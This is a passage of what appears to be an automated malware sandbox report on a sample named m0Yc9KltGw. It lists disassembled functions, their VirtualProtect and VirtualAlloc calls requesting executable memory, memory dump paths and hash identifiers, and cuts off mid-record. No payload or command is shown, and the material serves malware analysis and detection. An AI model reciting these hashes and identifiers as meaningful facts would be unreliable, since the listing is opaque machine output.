                                • Opcode Fuzzy Hash: aad947af98e30362e86e2b92d8b3205b88aba3b9e0c8fad8c88fe1fd8f4e81e2
                                • Instruction Fuzzy Hash: 9C4192B2D042299FFB248A14DC54FFA7779EB85310F1081FAE90E56680DB785EC58F61
                                Function 02962CD9 Relevance: 1.6, APIs: 1, Instructions: 117memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 39af89e2dafe2c84ea7b614e41ed2dbf16a7728f1a71b258c44c8b58e48ed275
                                • Instruction ID: 6e9a8f0edebc8ecfcb01043f4c5e1acd3965419849c12adc7a5f64abd1ac3f77
                                • Opcode Fuzzy Hash: 39af89e2dafe2c84ea7b614e41ed2dbf16a7728f1a71b258c44c8b58e48ed275
                                • Instruction Fuzzy Hash: 9B41D7B2D442689BEB208B24DC98BEABBB5EB95310F0541F6D84D67280C7795EC1CF91
                                Function 00405855 Relevance: 1.6, APIs: 1, Instructions: 112memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 26698836adf20349f07a75130048666eb633fdb8ccc8f7709fd91c293f743fec
                                • Instruction ID: 8aa1196ea3aec30a2f2c9c0e89f2ae59952a617b8e3309c75fbf9d5a1d973954
                                • Opcode Fuzzy Hash: 26698836adf20349f07a75130048666eb633fdb8ccc8f7709fd91c293f743fec
                                • Instruction Fuzzy Hash: F541C1B1E145289FE7248A14DC94EFBBBB4EB85310F1442FBD84E66280D63C6FC18E56
                                Function 0041DE5E Relevance: 1.6, APIs: 1, Instructions: 112memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0041E720
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 2347a04294a920a564eba5f548f3efa05d4a6930fd6d18887e0dd2839f7ba60c
                                • Instruction ID: d81e40f633c6fcc5586edad8573ffd37d281a8fcbad55665c2902fee77a34ab6
                                • Opcode Fuzzy Hash: 2347a04294a920a564eba5f548f3efa05d4a6930fd6d18887e0dd2839f7ba60c
                                • Instruction Fuzzy Hash: 3D4104B2D045649BF724CB15DC84AEBBB76EB81301F1081F7D94E62684D6785FC28F92
                                Function 02962ED5 Relevance: 1.6, APIs: 1, Instructions: 110memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 5a2412841a471b9ce1f4791cad42e4554012aa3a095847ac0b591ab0ea7326b9
                                • Instruction ID: 2c532f92974690ed0913bf037323916c2245962d35c26b374a206f6ba0d29938
                                • Opcode Fuzzy Hash: 5a2412841a471b9ce1f4791cad42e4554012aa3a095847ac0b591ab0ea7326b9
                                • Instruction Fuzzy Hash: 3541C9B2D442689BEB208B24DCD8BEABBB5EB95310F0541F5D94D67280C7395EC1CF91
                                Function 02942DDE Relevance: 1.6, APIs: 1, Instructions: 108memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: d81d449e7ef486cbf719da950df15fde916d8b4a7c7fb9b887677def4afa7811
                                • Instruction ID: 3248f970b2bb7e67a99e010490e116bc334cf746be3631c46cd5baea03a172bd
                                • Opcode Fuzzy Hash: d81d449e7ef486cbf719da950df15fde916d8b4a7c7fb9b887677def4afa7811
                                • Instruction Fuzzy Hash: D741A4B1D042299FEB248B54DC90FFAB775EB85300F1081FAE90E66680DA785EC58F61
                                Function 02922E73 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: a6cfdd27851f30719d41e4842cb60bd7f41991132ebb59f25a563f6626bee319
                                • Instruction ID: 5a8c1adfa5d2bbc3f9c74dd07067456d0451836140e5df6215279e78fc2da99c
                                • Opcode Fuzzy Hash: a6cfdd27851f30719d41e4842cb60bd7f41991132ebb59f25a563f6626bee319
                                • Instruction Fuzzy Hash: C231E2B1C051659FE724DB64DC44ADBBBB9EF80310F0085FAD84D67284D6399AC9CF91
                                Function 029423E7 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 58e5c6dd4fa211c94048a3f24dc0aedac1067d06d3f79c85a4fff7f79fece676
                                • Instruction ID: 5e27b8d3d4cfcfca72df2714a9507f66d97ae44c88676b38343f72b734a3e016
                                • Opcode Fuzzy Hash: 58e5c6dd4fa211c94048a3f24dc0aedac1067d06d3f79c85a4fff7f79fece676
                                • Instruction Fuzzy Hash: 4731C2F2E04258ABFB218A14DC44FFB7739EBC4310F1481F9E90D55A40D73D9AC68A21
                                Function 0294261F Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ad5348629e56da73c128a1b4bca9fd8fd05985c758aa73c9d6435a515f042a0c
                                • Instruction ID: 7d855956d50402d9f7916bc5ef18b9a3e1da058d8c8a39eecb436c4325a4adc2
                                • Opcode Fuzzy Hash: ad5348629e56da73c128a1b4bca9fd8fd05985c758aa73c9d6435a515f042a0c
                                • Instruction Fuzzy Hash: 1C31A3F2E042146BF7248A14DC44FFB7339EBC4310F1481F9E90E96A44E7399AC58A21
                                Function 02922C40 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 4e017ff6e3a2b054763130df4fb823248cc0ef604f3877ffaf01eef7a8ce4da3
                                • Instruction ID: 8e1fa6cd1a69b0ac3206bfda3fe232b6737464126d36bcc8fc8c75a05b921802
                                • Opcode Fuzzy Hash: 4e017ff6e3a2b054763130df4fb823248cc0ef604f3877ffaf01eef7a8ce4da3
                                • Instruction Fuzzy Hash: 9D31E1B1C041659FE724DB64DC44BEBBBB8EF80310F0085FAE84D66284D6399AC9CF91
                                Function 0296276C Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ff4982cbfff9e01290382924ecbba172b4cfb6dd4ef23e964a4e6b4c63e1fc18
                                • Instruction ID: cc6ae383c0818ce0cddc3ae8adaafe92286ea71800c929d31a4a6b5855c2a3d6
                                • Opcode Fuzzy Hash: ff4982cbfff9e01290382924ecbba172b4cfb6dd4ef23e964a4e6b4c63e1fc18
                                • Instruction Fuzzy Hash: 5C3127B2D042695BE7108774CC58BEBBFF6AFC1300F0981F9C48C26580D6395ED28A95
                                Function 0041E59F Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5fe5cf0710a085e0274d02e127f9eeaa699544e474fe57884f3e857fe0b7a646
                                • Instruction ID: 5f954aa0c4ddb898eab6439c2c9a233a6bdfdec6ef6a1b70e69242cf1a2bee87
                                • Opcode Fuzzy Hash: 5fe5cf0710a085e0274d02e127f9eeaa699544e474fe57884f3e857fe0b7a646
                                • Instruction Fuzzy Hash: 0B41E6749049698BDB25CB95DC94AEEBB71BF89306F5840EAD81D9A200D6389EC1CF11
                                Function 00405248 Relevance: 1.6, APIs: 1, Instructions: 90memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 8919e7fa10de618230a943befc8a3a8e16a67e2c86fecaaad87ba55b4280a643
                                • Instruction ID: 7f99f38c547632866d87ea786536627641fa5b86f1716259412bee2abf857c06
                                • Opcode Fuzzy Hash: 8919e7fa10de618230a943befc8a3a8e16a67e2c86fecaaad87ba55b4280a643
                                • Instruction Fuzzy Hash: 7D31ABB1E146189FE7508A14EC95EFB77B8EB44310F1042BBE90EA2680D67D6EC18E57
                                Function 02942AB6 Relevance: 1.6, APIs: 1, Instructions: 89memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 239dfeb65a5b546ffbea2571bb1e52a933c89467b824402d88d5f2c71cb356b7
                                • Instruction ID: bcd1cdb03aeede774a1120e124171fb2566ab0a8a20e8d282e2a258484877c25
                                • Opcode Fuzzy Hash: 239dfeb65a5b546ffbea2571bb1e52a933c89467b824402d88d5f2c71cb356b7
                                • Instruction Fuzzy Hash: BF31B4B2D14258ABEB208F24CC44FFAB379EB84300F1085E5E90D96640DB399EC58E61
                                Function 00405668 Relevance: 1.6, APIs: 1, Instructions: 86memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: d1bc0c3c3d54e404124d062b91a25bd3cf0f2015179254b54a74b803e05d3b14
                                • Instruction ID: faaac7964df34931971cfb33f1a669da848cd40cdbaab09df57bd9d8283eac76
                                • Opcode Fuzzy Hash: d1bc0c3c3d54e404124d062b91a25bd3cf0f2015179254b54a74b803e05d3b14
                                • Instruction Fuzzy Hash: 9F318DB1E146289FE7508A14DC91EFB77B8EB44310F1442FAE90EA2680D67D6FC08E56
                                Function 0040569A Relevance: 1.6, APIs: 1, Instructions: 86memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 67a6c5c1d7ac4f1489e7fa154d66fdbd68411b54d95c3e0eb7af296dfab4e2a4
                                • Instruction ID: d02bd3fec12ece5aef00ec91af9c2085a20bbe6b027b67bbdaf8bc1d4bf1a8bb
                                • Opcode Fuzzy Hash: 67a6c5c1d7ac4f1489e7fa154d66fdbd68411b54d95c3e0eb7af296dfab4e2a4
                                • Instruction Fuzzy Hash: 54318DB1E146289FE7548A14DC91EFB77B8EB44310F1442FAE90EA2680D67D6FC08E56
                                Function 004056BF Relevance: 1.6, APIs: 1, Instructions: 86memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 53551eaea6eff7480147f545dffd5159921a097fa63289ea9ac2efc7cbb58808
                                • Instruction ID: 1825f9431c9993e98292f7310788765b9a676f82f7c13db0ac91bc4126d8abad
                                • Opcode Fuzzy Hash: 53551eaea6eff7480147f545dffd5159921a097fa63289ea9ac2efc7cbb58808
                                • Instruction Fuzzy Hash: 84318DB1E146289FE7548A14DC91EFB77B8EB44310F1442FAE90EA2680D67D6FC08E56
                                Function 0292863F Relevance: 1.6, APIs: 1, Instructions: 333memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 4a87f2a009c4f392ff1578dfbf601089019f9664b7fb2fca7d2dae7c93fd07eb
                                • Instruction ID: 3c2afa716c1086d721a4355e6d84769ae053ce35f8ef75f140b1a70a15aedccf
                                • Opcode Fuzzy Hash: 4a87f2a009c4f392ff1578dfbf601089019f9664b7fb2fca7d2dae7c93fd07eb
                                • Instruction Fuzzy Hash: 35E186B4E046688FEB24CA14DC94BAAB776FF84305F1082EAD40DA7688D7795EC58F11
                                Function 02962FAF Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ec02e1e4feb3c80c6adfa727321f3eb195846c654eb09cb7909f54025a695d6c
                                • Instruction ID: 421c2a25837bd37ef9df8c1345bb63eb8b0e5862cd5f5f50bbcc71bd2557862c
                                • Opcode Fuzzy Hash: ec02e1e4feb3c80c6adfa727321f3eb195846c654eb09cb7909f54025a695d6c
                                • Instruction Fuzzy Hash: FB31B8B1D042699BEB208B64CC94BEABBF5AF85700F0542F9D84D67281C7355EC2CF95
                                Function 02942EAD Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: a80a29e17d8f813c7b70764603bca8c33264147c749a89b63a7a28b7058a01bf
                                • Instruction ID: 97660a0306e1d6010161f1862e80d69e130d2565902a29eab282f60f5a37cb49
                                • Opcode Fuzzy Hash: a80a29e17d8f813c7b70764603bca8c33264147c749a89b63a7a28b7058a01bf
                                • Instruction Fuzzy Hash: 863180B1D442699FEB218B24CC90BEAB775EB85310F2085E5E90DA6640DB399FC58F21
                                Function 02942EBE Relevance: 1.6, APIs: 1, Instructions: 78memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 5d0fd1ae91ea226b14b0b5c44215ec42e19fedf3cd54d459f6eacee1592bd391
                                • Instruction ID: 5bbbc23cdc4ded25b02a0f5c4d2868dde1b425b9a1500e909335b7e871e4a6ee
                                • Opcode Fuzzy Hash: 5d0fd1ae91ea226b14b0b5c44215ec42e19fedf3cd54d459f6eacee1592bd391
                                • Instruction Fuzzy Hash: 573185B1D442699FEB25CB24CC80FEAB775EB85310F2081E9E90D56644DB389FC58F15
                                Function 029632BA Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 2d21c0b34c9788491b81b528c25ee2ce64cacf79862f98fb81aeef3d19952839
                                • Instruction ID: 7baad91ec9539075846e9e71117682ba3d529e0fa0e9ad7532972fca841d56c6
                                • Opcode Fuzzy Hash: 2d21c0b34c9788491b81b528c25ee2ce64cacf79862f98fb81aeef3d19952839
                                • Instruction Fuzzy Hash: 202107B2D042695BEB108B74CD94AEABFF5AF85700F0541F9D48D67281DA345EC18F85
                                Function 02963007 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 3b0059f80076b27c0c70d3cc995375909e97c04dc89d395549a24924357da82b
                                • Instruction ID: 6994518bfd366080624fc583ad6bd404c4a6a0bef2d35b02ba2e337d90b03b02
                                • Opcode Fuzzy Hash: 3b0059f80076b27c0c70d3cc995375909e97c04dc89d395549a24924357da82b
                                • Instruction Fuzzy Hash: C721F7B2D042699BEB208B64CC94AEABBF6AF85700F0541F5D48D63180DA355EC28F95
                                Function 02963039 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 5d6d9fd0495b1833a69c2f846602121d8ae422c577135a5fa8b79c07e6a9623f
                                • Instruction ID: 05cca28db6b234cc533e1ee3550825bd21fa8312eed3d9731ad17eaccc4c4a31
                                • Opcode Fuzzy Hash: 5d6d9fd0495b1833a69c2f846602121d8ae422c577135a5fa8b79c07e6a9623f
                                • Instruction Fuzzy Hash: 052108B2D042699BEB20CB64CC94AEABFF6AFC5700F0581F5D48D63180DA355EC28F95
                                Function 0296305E Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: e604e82e8c333efc5e61c31fa6232922af0d462dba9eaa3c901ddbf306ee3e43
                                • Instruction ID: e7a9fb9abfd5657dca2c06e77fbb672b3ff5945eb1fbd0d1e0fa911dc1f20ebd
                                • Opcode Fuzzy Hash: e604e82e8c333efc5e61c31fa6232922af0d462dba9eaa3c901ddbf306ee3e43
                                • Instruction Fuzzy Hash: 6E21F9B2D042695BEB108B64CC94AEABBF6AFC5700F0541F9D48D63180DA355EC18F95
                                Function 029431A1 Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 60b1fca8b6581e84d73fed5606978d4526972337b1b519dfa549f04aa852fb8b
                                • Instruction ID: d68b0b64a1198a9be949a69f9e7e0b4342f7cd94a63d5bf33eeb9390d66992df
                                • Opcode Fuzzy Hash: 60b1fca8b6581e84d73fed5606978d4526972337b1b519dfa549f04aa852fb8b
                                • Instruction Fuzzy Hash: D92183B2D05259AFEB21CA24CC40FEEB735EB84300F20C1E5E90D96644DB389EC58F15
                                Function 02942B0D Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: a3de049d54785bd6be312539eee85e734a079ea5e3e89847f026922676f771a5
                                • Instruction ID: e09e274c13f18c5b66e1f1166a249385b6eeb30cd504290efd2124e05ff6e085
                                • Opcode Fuzzy Hash: a3de049d54785bd6be312539eee85e734a079ea5e3e89847f026922676f771a5
                                • Instruction Fuzzy Hash: D22193B2A04259ABEB21CA24CC44FFEB775EBC4300F24C1E5E90D96A44D779AEC58F15
                                Function 02942F19 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b8bb818cb25102c446a40a34b7d405ebbb6f7adad3b2c498efde0bfb19d21046
                                • Instruction ID: f7ce969fc1da27a852ef5f6a24c7df84919748704ccbd3cc72841e40331ee1bf
                                • Opcode Fuzzy Hash: b8bb818cb25102c446a40a34b7d405ebbb6f7adad3b2c498efde0bfb19d21046
                                • Instruction Fuzzy Hash: 7A2184B1D44269AFEB20CA24CC80FEEB775EB84300F20C5E5E90DA6644D7389EC58F25
                                Function 02942F4B Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 99e5c2f204b4e2e2ca4b7b839bbf908759d64a5760e4c36f304bd68dd63153fd
                                • Instruction ID: c13e552566eb71352ea5c9f0297007b755f6de2fca1c905aece1fe5f8f9b4243
                                • Opcode Fuzzy Hash: 99e5c2f204b4e2e2ca4b7b839bbf908759d64a5760e4c36f304bd68dd63153fd
                                • Instruction Fuzzy Hash: 032162B1D44269ABEB20CA24CC80FEEB775EB84300F20C1E5E90D66644D7389EC58F15
                                Function 02942F70 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
